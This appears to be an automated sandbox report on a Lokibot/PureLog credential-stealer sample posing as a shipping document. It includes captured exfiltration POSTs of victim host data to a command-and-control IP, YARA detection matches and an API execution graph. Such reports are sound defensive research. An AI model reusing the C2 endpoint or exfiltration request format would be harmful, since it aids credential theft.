                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:57.712359905 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:56 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:57.712426901 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:57.712560892 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:57.722717047 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:57.723161936 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:57.723196983 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:57.723332882 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:57.723440886 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:57.723514080 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:57.723647118 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              89192.168.2.44983945.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:57.993135929 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:58.124128103 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:58.941550016 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:58 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:58.941605091 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:58.950481892 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:58.950798035 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:58.950886011 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:58.951003075 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:58.951208115 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:58.951365948 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:58.951409101 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 25, 2024 09:43:58.951447964 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                              Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:09:41:52
                                              Start date:25/04/2024
                                              Path:C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"
                                              Imagebase:0xc90000
                                              File size:574'472 bytes
                                              MD5 hash:34730F3DA822589C3B36EC7197EDE429
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1735740544.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1739256107.0000000009480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1735740544.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1734651878.000000000313D000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1735740544.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:09:41:55
                                              Start date:25/04/2024
                                              Path:C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"
                                              Imagebase:0x330000
                                              File size:574'472 bytes
                                              MD5 hash:34730F3DA822589C3B36EC7197EDE429
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:3
                                              Start time:09:41:55
                                              Start date:25/04/2024
                                              Path:C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe"
                                              Imagebase:0xa00000
                                              File size:574'472 bytes
                                              MD5 hash:34730F3DA822589C3B36EC7197EDE429
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.2873103232.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.2872695096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:false

                                              Target ID:6
                                              Start time:09:41:55
                                              Start date:25/04/2024
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5516 -s 1376
                                              Imagebase:0xbb0000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:11%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:1.5%
                                                Total number of Nodes:341
                                                Total number of Limit Nodes:9
                                                execution_graph 49427 7c89c88 49428 7c89ec3 49427->49428 49429 7c89cb0 49427->49429 49429->49428 49430 7c8a0c5 KiUserExceptionDispatcher 49429->49430 49431 7c8a0ec 49430->49431 49791 5680508 49793 2e971bc 2 API calls 49791->49793 49794 2e9921e 2 API calls 49791->49794 49792 568051b 49793->49792 49794->49792 49432 2e94668 49433 2e9467a 49432->49433 49434 2e94686 49433->49434 49438 2e94779 49433->49438 49443 2e93e30 49434->49443 49436 2e946a5 49439 2e9479d 49438->49439 49447 2e94888 49439->49447 49451 2e94877 49439->49451 49444 2e93e3b 49443->49444 49459 2e95c4c 49444->49459 49446 2e9765f 49446->49436 49449 2e948af 49447->49449 49448 2e9498c 49448->49448 49449->49448 49455 2e94538 49449->49455 49452 2e94888 49451->49452 49453 2e9498c 49452->49453 49454 2e94538 CreateActCtxA 49452->49454 49454->49453 49456 2e95d18 CreateActCtxA 49455->49456 49458 2e95ddb 49456->49458 49460 2e95c57 49459->49460 49463 2e9715c 49460->49463 49462 2e97f2d 49462->49446 49464 2e97167 49463->49464 49467 2e9718c 49464->49467 49466 2e98002 49466->49462 49469 2e97197 49467->49469 49471 2e971bc 49469->49471 49470 2e98105 49470->49466 49472 2e971c7 49471->49472 49474 2e994eb 49472->49474 49478 2e9bb98 49472->49478 49473 2e99529 49473->49470 49474->49473 49482 2e9dc88 49474->49482 49487 2e9dc98 49474->49487 49492 2e9bbbf 49478->49492 49496 2e9bbd0 49478->49496 49479 2e9bbae 49479->49474 49483 2e9dcb9 49482->49483 49486 2e9dcdd 49483->49486 49519 2e9de48 49483->49519 49523 2e9de38 49483->49523 49486->49473 49488 2e9dcb9 49487->49488 49489 2e9dcdd 49488->49489 49490 2e9de48 2 API calls 49488->49490 49491 2e9de38 2 API calls 49488->49491 49489->49473 49490->49489 49491->49489 49493 2e9bbd0 49492->49493 49499 2e9bcb8 49493->49499 49494 2e9bbdf 49494->49479 49498 2e9bcb8 2 API calls 49496->49498 49497 2e9bbdf 49497->49479 49498->49497 49500 2e9bcd9 49499->49500 49501 2e9bcfc 49499->49501 49500->49501 49507 2e9bf60 49500->49507 49511 2e9bf50 49500->49511 49501->49494 49502 2e9bcf4 49502->49501 49503 2e9bf00 GetModuleHandleW 49502->49503 49504 2e9bf2d 49503->49504 49504->49494 49508 2e9bf74 49507->49508 49510 2e9bf99 49508->49510 49515 2e9b6c8 49508->49515 49510->49502 49512 2e9bf60 49511->49512 49513 2e9b6c8 LoadLibraryExW 49512->49513 49514 2e9bf99 49512->49514 49513->49514 49514->49502 49516 2e9c140 LoadLibraryExW 49515->49516 49518 2e9c1b9 49516->49518 49518->49510 49520 2e9de55 49519->49520 49521 2e9de8f 49520->49521 49527 2e9da28 49520->49527 49521->49486 49524 2e9de48 49523->49524 49525 2e9de8f 49524->49525 49526 2e9da28 2 API calls 49524->49526 49525->49486 49526->49525 49528 2e9da33 49527->49528 49530 2e9e7a0 49528->49530 49531 2e9db54 49528->49531 49530->49530 49532 2e9db5f 49531->49532 49533 2e971bc 2 API calls 49532->49533 49534 2e9e80f 49533->49534 49534->49530 49851 7c89530 49852 7c896bb 49851->49852 49854 7c89556 49851->49854 49854->49852 49855 7c85e98 49854->49855 49856 7c897b0 PostMessageW 49855->49856 49857 7c8981c 49856->49857 49857->49854 49535 2e9df60 49536 2e9dfa6 49535->49536 49540 2e9e140 49536->49540 49543 2e9e130 49536->49543 49537 2e9e093 49547 2e9daf0 49540->49547 49544 2e9e140 49543->49544 49545 2e9daf0 DuplicateHandle 49544->49545 49546 2e9e16e 49545->49546 49546->49537 49548 2e9e1a8 DuplicateHandle 49547->49548 49549 2e9e16e 49548->49549 49549->49537 49550 55a98d0 49551 55a98fd 49550->49551 49592 55a9450 49551->49592 49553 55a995d 49597 55a9470 49553->49597 49556 55a9470 2 API calls 49557 55a99d8 49556->49557 49601 55a9490 49557->49601 49559 55a9a30 49560 55a9490 2 API calls 49559->49560 49561 55a9a62 49560->49561 49562 55a9490 2 API calls 49561->49562 49563 55a9a94 49562->49563 49564 55a9490 2 API calls 49563->49564 49565 55a9ac6 49564->49565 49566 55a9490 2 API calls 49565->49566 49567 55a9af8 49566->49567 49568 55a9470 2 API calls 49567->49568 49569 55a9b5c 49568->49569 49570 55a9470 2 API calls 49569->49570 49571 55a9bc0 49570->49571 49572 55a9470 2 API calls 49571->49572 49573 55a9cef 49572->49573 49574 55a9470 2 API calls 49573->49574 49575 55a9e18 49574->49575 49576 55a9470 2 API calls 49575->49576 49577 55a9e47 49576->49577 49578 55a9470 2 API calls 49577->49578 49579 55a9f73 49578->49579 49580 55a9470 2 API calls 49579->49580 49581 55a9fd7 49580->49581 49582 55a9470 2 API calls 49581->49582 49583 55aa06d 49582->49583 49584 55a9470 2 API calls 49583->49584 49585 55aa103 49584->49585 49586 55a9470 2 API calls 49585->49586 49587 55aa135 49586->49587 49588 55a9470 2 API calls 49587->49588 49589 55aa261 49588->49589 49590 55a9470 2 API calls 49589->49590 49591 55aa293 49590->49591 49593 55a945b 49592->49593 49595 2e971bc 2 API calls 49593->49595 49605 2e9921e 49593->49605 49594 55aed4f 49594->49553 49595->49594 49598 55a947b 49597->49598 49612 55a9788 49598->49612 49600 55a99af 49600->49556 49602 55a949b 49601->49602 49603 55a9788 2 API calls 49602->49603 49604 55afceb 49603->49604 49604->49559 49606 2e9923a 49605->49606 49608 2e994eb 49606->49608 49609 2e9bb98 2 API calls 49606->49609 49607 2e99529 49607->49594 49608->49607 49610 2e9dc88 2 API calls 49608->49610 49611 2e9dc98 2 API calls 49608->49611 49609->49608 49610->49607 49611->49607 49613 55a9793 49612->49613 49615 2e971bc 2 API calls 49613->49615 49616 2e9921e 2 API calls 49613->49616 49614 55af54c 49614->49600 49615->49614 49616->49614 49617 55a27c0 49620 55a1c70 49617->49620 49621 55a2810 CreateWindowExW 49620->49621 49623 55a2934 49621->49623 49795 130d01c 49796 130d034 49795->49796 49797 130d08e 49796->49797 49802 55a29c8 49796->49802 49806 55a29b7 49796->49806 49810 55a1c9c 49796->49810 49819 55a3728 49796->49819 49803 55a29ee 49802->49803 49804 55a1c9c CallWindowProcW 49803->49804 49805 55a2a0f 49804->49805 49805->49797 49807 55a29ee 49806->49807 49808 55a1c9c CallWindowProcW 49807->49808 49809 55a2a0f 49808->49809 49809->49797 49811 55a1ca7 49810->49811 49812 55a3799 49811->49812 49814 55a3789 49811->49814 49841 55a1dc4 49812->49841 49828 55a398c 49814->49828 49833 55a38b0 49814->49833 49837 55a38c0 49814->49837 49815 55a3797 49821 55a3738 49819->49821 49820 55a3799 49822 55a1dc4 CallWindowProcW 49820->49822 49821->49820 49823 55a3789 49821->49823 49824 55a3797 49822->49824 49825 55a398c CallWindowProcW 49823->49825 49826 55a38c0 CallWindowProcW 49823->49826 49827 55a38b0 CallWindowProcW 49823->49827 49825->49824 49826->49824 49827->49824 49829 55a399a 49828->49829 49830 55a394a 49828->49830 49845 55a3978 49830->49845 49831 55a3960 49831->49815 49835 55a38b7 49833->49835 49834 55a3960 49834->49815 49836 55a3978 CallWindowProcW 49835->49836 49836->49834 49839 55a38d4 49837->49839 49838 55a3960 49838->49815 49840 55a3978 CallWindowProcW 49839->49840 49840->49838 49842 55a1dcf 49841->49842 49843 55a4e7a CallWindowProcW 49842->49843 49844 55a4e29 49842->49844 49843->49844 49844->49815 49846 55a3989 49845->49846 49848 55a4db0 49845->49848 49846->49831 49849 55a1dc4 CallWindowProcW 49848->49849 49850 55a4dca 49849->49850 49850->49846 49624 7c86797 49629 7c86fc0 49624->49629 49644 7c87036 49624->49644 49660 7c86fd0 49624->49660 49625 7c867bc 49630 7c86fea 49629->49630 49631 7c86ff2 49630->49631 49675 7c87468 49630->49675 49680 7c87556 49630->49680 49685 7c873fe 49630->49685 49690 7c878bb 49630->49690 49694 7c8759b 49630->49694 49699 7c87527 49630->49699 49704 7c87764 49630->49704 49708 7c875c4 49630->49708 49713 7c874ef 49630->49713 49720 7c876ad 49630->49720 49724 7c8796c 49630->49724 49729 7c87ba8 49630->49729 49631->49625 49645 7c86fc4 49644->49645 49647 7c87039 49644->49647 49646 7c86ff2 49645->49646 49648 7c87468 2 API calls 49645->49648 49649 7c87ba8 2 API calls 49645->49649 49650 7c8796c 2 API calls 49645->49650 49651 7c876ad 2 API calls 49645->49651 49652 7c874ef 4 API calls 49645->49652 49653 7c875c4 2 API calls 49645->49653 49654 7c87764 2 API calls 49645->49654 49655 7c87527 2 API calls 49645->49655 49656 7c8759b 2 API calls 49645->49656 49657 7c878bb 2 API calls 49645->49657 49658 7c873fe 2 API calls 49645->49658 49659 7c87556 2 API calls 49645->49659 49646->49625 49647->49625 49648->49646 49649->49646 49650->49646 49651->49646 49652->49646 49653->49646 49654->49646 49655->49646 49656->49646 49657->49646 49658->49646 49659->49646 49661 7c86fea 49660->49661 49662 7c87468 2 API calls 49661->49662 49663 7c87ba8 2 API calls 49661->49663 49664 7c8796c 2 API calls 49661->49664 49665 7c876ad 2 API calls 49661->49665 49666 7c874ef 4 API calls 49661->49666 49667 7c875c4 2 API calls 49661->49667 49668 7c87764 2 API calls 49661->49668 49669 7c87527 2 API calls 49661->49669 49670 7c8759b 2 API calls 49661->49670 49671 7c86ff2 49661->49671 49672 7c878bb 2 API calls 49661->49672 49673 7c873fe 2 API calls 49661->49673 49674 7c87556 2 API calls 49661->49674 49662->49671 49663->49671 49664->49671 49665->49671 49666->49671 49667->49671 49668->49671 49669->49671 49670->49671 49671->49625 49672->49671 49673->49671 49674->49671 49676 7c873fd 49675->49676 49677 7c873d0 49675->49677 49733 7c861a8 49676->49733 49737 7c8619d 49676->49737 49677->49631 